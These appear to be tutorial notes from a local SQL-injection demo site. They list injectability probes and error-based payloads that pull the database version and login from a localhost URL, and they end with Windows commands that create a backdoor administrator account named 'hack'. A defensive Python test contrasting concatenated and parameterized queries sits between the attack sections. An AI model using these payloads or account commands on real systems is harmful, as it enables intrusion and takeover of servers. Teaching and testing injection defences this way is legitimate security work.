SQL Injection Attacks (Part 2)
Source file: d:\code\web-attackDome\web-attackDome\sql-injection\地址栏注入演示\NewsDetails.aspx.cs
Articles
ID
Determine whether the page is injectable:
Step 1: '
Step 2: http://localhost:1164/sql-injection/地址栏注入演示/NewsDetails.aspx?id=1' and '1'='1
Step 3:
http://localhost:1164/sql-injection/地址栏注入演示/NewsDetails.aspx?id=1' and '2'='1
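
The three checks above, replayed as a regression test against a concatenated query and a parameterized one. This is an added example, not code from the original page or from NewsDetails.aspx.cs. Assumptions: SQLite stands in for SQL Server, the concatenated query is an assumed shape of the vulnerable page, and the Title column, sample rows and function names are constructed.

```python
import re
import sqlite3

def make_db():
    # Constructed sample rows; SQLite stands in for the page's SQL Server.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Articles (ID INTEGER PRIMARY KEY, Title TEXT)")
    db.executemany("INSERT INTO Articles VALUES (?, ?)",
                   [(1, "First article"), (2, "Second article")])
    return db

def details_concatenated(db, raw_id):
    # Assumed vulnerable pattern: the id value is pasted into the SQL text.
    sql = "SELECT Title FROM Articles WHERE ID='" + raw_id + "'"
    try:
        return [row[0] for row in db.execute(sql)]
    except sqlite3.Error:
        return "error"  # what the lone quote in step 1 provokes

def details_parameterized(db, raw_id):
    # Hardened form: accept only a short decimal id, then bind it as a value.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []
    rows = db.execute("SELECT Title FROM Articles WHERE ID = ?", (int(raw_id),))
    return [row[0] for row in rows]

# The id values used in steps 1 to 3 above.
PROBES = {"quote": "1'", "true": "1' and '1'='1", "false": "1' and '2'='1"}

def responds_to_probes(handler, db):
    # True when the handler shows the injectable pattern: the always-true
    # condition returns the normal page and the always-false one does not.
    baseline = handler(db, "1")
    results = {name: handler(db, value) for name, value in PROBES.items()}
    return results["true"] == baseline and results["false"] != baseline

if __name__ == "__main__":
    db = make_db()
    for handler in (details_concatenated, details_parameterized):
        print(handler.__name__, "injectable:", responds_to_probes(handler, db))
```
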
====================================================================================
Check the version:
http://localhost:1164/sql-injection/地址栏注入演示/NewsDetails.aspx?id=1' and 1=(select @@version) and '1'='1
Check the user:
http://localhost:1164/sql-injection/地址栏注入演示/NewsDetails.aspx?id=1' and 1=(select system_user) and '1'='1
net user hack 123456 /add
net localgroup administrators hack /add